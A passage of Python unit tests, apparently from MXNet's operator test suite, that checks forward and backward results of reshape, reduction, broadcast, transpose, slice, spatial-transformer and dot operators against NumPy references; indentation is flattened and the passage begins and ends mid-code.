test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
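# Note (added for readability; summarizing MXNet's documented Reshape codes used
# in the test cases above): 0 copies the corresponding input dimension, -1 infers
# one dimension from the remaining size, -2 copies all remaining dimensions,
# -3 merges two consecutive dimensions into one, and -4 splits one dimension into
# the two values that follow it (one of which may be -1). With reverse=True the
# special values are matched from the right.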
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
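    # Note on the reference gradients passed below: each backward lambda encodes the
    # analytic derivative of its reduction, e.g. d(sum)/dx = 1, d(mean)/dx = 1/N
    # (N = number of reduced elements), d(prod)/dx = prod/x, nansum/nanprod zero the
    # gradient at NaN positions, and max/min route the gradient only to elements
    # equal to the reduced value. outgrad is reshaped to the keepdims shape so it
    # broadcasts back over the reduced axes.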
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data that has ndim between 1-5 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_pseudo2dtranspose():
    def getTwoInts(lo, hi):
        # Draw two distinct integers in [lo, hi) and return them in sorted order.
        n1 = np.random.randint(lo, hi)
        n2 = np.random.randint(lo, hi - 1)
        n2 = n2 if n2 < n1 else n2 + 1
        return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
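    # getTranspAxes builds permutations of the form (leading dims, trailing block,
    # middle block); e.g. for ndim=4 and (n1, n2)=(1, 3) it returns (0, 3, 1, 2).
    # As the test name suggests, such permutations exercise transposes that reduce
    # to swapping two contiguous blocks of axes ("pseudo-2D" transposes).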
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
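    # With the loc-net conv/fc weights zeroed below, the predicted affine theta is
    # simply loc_fc_bias = [0.5, 0, 0, 0, 0.5, 0], i.e. a 0.5x scaling with no
    # translation. Sampling the roughly half-sized target grid then amounts to a
    # centre crop of the input, which is what the forward/backward checks compare
    # against ([:, :, h//4:h-h//4, w//4:w-w//4]).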
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]: # for convenience of testing, the third and fourth input dims should be of the form 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
                        continue  # for 1-D inputs the shapes below do not depend on k, so skip duplicate runs
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
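    # Note: the transposed variants above are handed pre-transposed numpy inputs
    # (m1_npy.T / m2_npy.T) so that the operands have compatible shapes for
    # transpose_a/transpose_b; check_numeric_gradient then only verifies that the
    # symbolic backward matches a finite-difference estimate of the forward pass.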
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
